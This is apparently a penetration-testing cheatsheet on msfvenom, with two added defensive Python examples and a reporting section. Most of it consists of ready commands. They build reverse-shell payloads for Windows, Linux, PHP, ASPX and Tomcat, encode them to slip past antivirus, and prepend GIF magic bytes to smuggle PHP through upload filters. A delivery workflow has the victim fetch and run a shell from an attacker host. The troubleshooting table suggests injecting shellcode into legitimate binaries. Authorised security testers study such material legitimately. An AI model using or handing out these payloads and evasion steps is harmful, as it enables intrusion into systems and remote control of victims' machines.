🛡️ Methodology Checklist
- Windows x64 EXE: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f exe -o shell.exe
- Linux ELF: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f elf -o shell
- PHP: msfvenom -p php/meterpreter_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f raw -o shell.php
- WAR (Tomcat): msfvenom -p java/jsp_shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f war -o shell.war
- Set up matching handler before delivering
- Verify payload architecture matches target
🎯 Operational Context
Use when: Generating standalone payloads for delivery outside MSF — EXE, DLL, shellcode, Python, PHP, PowerShell, VBA formats.
Think Dumber First: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=443 -f exe > shell.exe — use port 443 (HTTPS-like) to blend with egress traffic. Always match architecture. Use -e x86/shikata_ga_nai -i 5 for basic encoding (won’t beat modern AV alone).
Skip when: Target has modern EDR — msfvenom executables have high detection rates without obfuscation.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| msfvenom -l payloads | List all available payloads |
| msfvenom -p linux/x64/shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -f elf > shell.elf | Linux 64-bit stageless reverse shell (ELF) |
| msfvenom -p windows/shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -f exe > shell.exe | Windows stageless reverse shell (EXE) |
| msfvenom -p windows/x64/shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -f aspx -o shell.aspx | Windows ASPX reverse shell (IIS) |
| msfvenom -p php/reverse_php LHOST=[TARGET_IP] LPORT=443 -f raw > shell.php | PHP reverse shell (Linux web server) |
| msfvenom -p java/jsp_shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -f war -o shell.war | Java WAR reverse shell (Tomcat) |
| msfvenom -p windows/shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe | Windows encoded payload (Shikata Ga Nai, 10 iterations) |
| echo 'GIF89a;' > shell.php && msfvenom -p php/reverse_php LHOST=[TARGET_IP] LPORT=443 -f raw >> shell.php | PHP with GIF magic bytes (bypass content-type checks) |
| sudo nc -lvnp 443 | Catch the incoming shell |
| chmod +x shell.elf && ./shell.elf | Execute Linux payload (victim) |
🔬 Deep Dive & Workflow
Staged vs. Stageless — The Naming Convention
| Type | Identifier | Behavior | Example |
|---|---|---|---|
| Staged | Slash / in shell type | Tiny stager downloads rest of payload | linux/x86/shell/reverse_tcp |
| Stageless | Underscore _ in shell type | Entire payload in one file | linux/x86/shell_reverse_tcp |
Read it as: shell/reverse_tcp = “shell, THEN reverse_tcp” (two stages)
shell_reverse_tcp = “shell_reverse_tcp is one thing” (stageless)
Practical difference:
- Staged: smaller file, requires stable C2 connection for second download — can be fragile
- Stageless: larger file, more stable, generates less network traffic — preferred for reliability
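To make the naming rule above mechanical, here is an added example (not code from the original cheatsheet) that parses a payload name into platform, architecture, shell type and transport and labels it staged or stageless; it assumes only the page's slash-versus-underscore rule and the page's own claim that a windows/ name with no arch component is the x86 default.

```python
"""Classify msfvenom payload names by the staged/stageless naming convention.

Added example, not part of the original cheatsheet. It encodes only the rule the
page states (slash between shell type and transport = staged, underscore =
stageless) plus the page's note that a name without an arch component selects
the default x86 payload, the pitfall listed in the troubleshooting table.
"""
from dataclasses import dataclass

ARCHES = ("x86", "x64", "aarch64", "armle", "mipsle", "mipsbe")
NATIVE_PLATFORMS = ("windows", "linux")
# Shell types used on the page; checked in this order so jsp_shell beats shell.
SHELL_TYPES = ("meterpreter", "jsp_shell", "shell")


@dataclass(frozen=True)
class PayloadInfo:
    platform: str
    arch: str        # x86/x64/... for native platforms, "n/a" for php or java
    shell: str       # "" when the name has no separate shell component
    transport: str
    staged: bool


def parse_payload(name: str) -> PayloadInfo:
    parts = name.strip().split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    platform, rest = parts[0], parts[1:]
    if rest[0] in ARCHES:
        arch, rest = rest[0], rest[1:]
    else:
        arch = "x86" if platform in NATIVE_PLATFORMS else "n/a"
    if len(rest) == 2:                  # shell/transport: stager, then the rest
        return PayloadInfo(platform, arch, rest[0], rest[1], staged=True)
    if len(rest) != 1:
        raise ValueError(f"unexpected payload shape: {name!r}")
    single = rest[0]                    # shell_transport: one self-contained blob
    for shell in SHELL_TYPES:
        if single.startswith(shell + "_"):
            return PayloadInfo(platform, arch, shell, single[len(shell) + 1:], staged=False)
    return PayloadInfo(platform, arch, "", single, staged=False)   # e.g. php/reverse_php


if __name__ == "__main__":
    for n in ("linux/x86/shell/reverse_tcp", "linux/x86/shell_reverse_tcp",
              "windows/shell_reverse_tcp", "java/jsp_shell_reverse_tcp"):
        print(parse_payload(n))
```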
Payload Format Reference
| Target | Format Flag | Extension | Use Case |
|---|---|---|---|
| Linux | -f elf | .elf | Standard Linux executable |
| Windows | -f exe | .exe | Standard Windows executable |
| Windows IIS | -f aspx | .aspx | Web server code execution |
| PHP web | -f raw | .php | PHP web server |
| Java/Tomcat | -f war | .war | Java application server |
| PowerShell | -f ps1 | .ps1 | PowerShell script |
Encoding for AV Evasion
msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=443 \
-e x86/shikata_ga_nai -i 10 -f exe > encoded.exe
- -e x86/shikata_ga_nai — XOR-based polymorphic encoder (most common)
- -i 10 — 10 encoding iterations
What encoding does:
- Adds a “decoder stub” to the file header
- Decoder runs at execution time, unpacks payload into RAM
- Bypasses static (disk) AV scans
- Modern AV with behavior analysis catches it after execution — only buys you the download
Without encoding: Defender blocks the download. With encoding: File downloads, may get caught mid-execution.
Magic Bytes Bypass (PHP File Upload Checks)
echo 'GIF89a;' > shell.php
msfvenom -p php/reverse_php LHOST=[IP] LPORT=443 -f raw >> shell.php
Prepending GIF89a; makes the file look like a GIF to content-type validators while remaining valid PHP.
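From the defender's side, the check the trick above defeats reads only the first six bytes. The added example below (not code from the original cheatsheet) shows that weak magic-only check next to a validator that also demands a structurally plausible GIF and rejects a PHP open tag anywhere in the body; the sample inputs are constructed.

```python
"""Server-side upload check that is not fooled by a GIF89a; prefix.

Added example written from the defender's side; not part of the original
cheatsheet. A magic-bytes-only validator accepts the shell.php built above;
this one also requires a plausible GIF structure and rejects PHP open tags
anywhere in the body. All sample inputs are constructed.
"""
import struct

GIF_MAGIC = (b"GIF87a", b"GIF89a")
PHP_TAGS = (b"<?php", b"<?=")   # short "<?" omitted: it occurs in real binary data
ALLOWED_EXT = {"gif"}


def magic_only_check(data: bytes) -> bool:
    """The weak check the page's trick defeats: first six bytes only."""
    return data[:6] in GIF_MAGIC


def looks_like_real_gif(data: bytes) -> bool:
    """Magic, non-zero logical screen size and the 0x3B trailer, not just magic."""
    if len(data) < 14 or data[:6] not in GIF_MAGIC:
        return False
    width, height = struct.unpack("<HH", data[6:10])
    return width > 0 and height > 0 and data.endswith(b"\x3b")


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Re-encoding the image server-side is stronger still."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    if not looks_like_real_gif(data):
        return False, "not a well-formed GIF"
    if any(tag in data for tag in PHP_TAGS):
        return False, "PHP open tag inside image body"
    return True, "ok"


# Constructed samples: the page's trick (magic glued to PHP) and a hand-built 1x1 GIF.
FAKE_GIF_PHP = b"GIF89a;\n<?php echo 'constructed sample'; ?>\n"
REAL_GIF = (b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x00\x00\x00"   # screen descriptor
            + b",\x00\x00\x00\x00\x01\x00\x01\x00\x00"              # image descriptor
            + b"\x02\x02\x44\x01\x00"                                # LZW data block
            + b"\x3b")                                               # trailer

if __name__ == "__main__":
    for name, blob in (("avatar.gif", FAKE_GIF_PHP), ("avatar.gif", REAL_GIF)):
        print(name, "magic-only:", magic_only_check(blob), "full:", validate_upload(name, blob))
```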
Full Delivery Workflow
# 1. Generate payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.x LPORT=443 -f elf > shell.elf
# 2. Start listener
sudo nc -lvnp 443
# 3. Host for delivery
sudo python3 -m http.server 80
# 4. Victim downloads and runs
wget http://[ATTACKER_IP]/shell.elf && chmod +x shell.elf && ./shell.elf
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Generated EXE detected by AV | Default msfvenom signatures | Use custom encoders, Veil, or manually inject shellcode into a legitimate binary |
| Payload architecture wrong | Default x86 payload on x64 system | Specify: msfvenom -p windows/x64/... or check target with systeminfo \| grep 'System Type' |
| PHP payload returns 500 error | PHP not enabled or wrong path | Test with <?php phpinfo(); ?> first; confirm system() not disabled in php.ini |
| PowerShell payload too long for command injection | Character limit | Base64 encode the command: msfvenom -f psh-cmd generates encoded PS one-liner |
| DLL payload not loading | Wrong DLL export | Use msfvenom -f dll and verify exports with dumpbin /exports shell.dll on Windows |
📝 Reporting Trigger
Finding Title: Standalone Payload Generated and Delivered for RCE
Impact: Custom msfvenom payload bypasses signature-based AV and delivers Meterpreter session, enabling full post-exploitation without requiring direct MSF exploit execution.
Root Cause: No application allowlisting or behavioral analysis to detect shellcode execution within signed or unsigned executables.
Recommendation: Implement application allowlisting (WDAC/AppLocker). Deploy behavioral EDR to detect shellcode injection patterns. Network-level egress filtering to block outbound C2 on non-standard ports.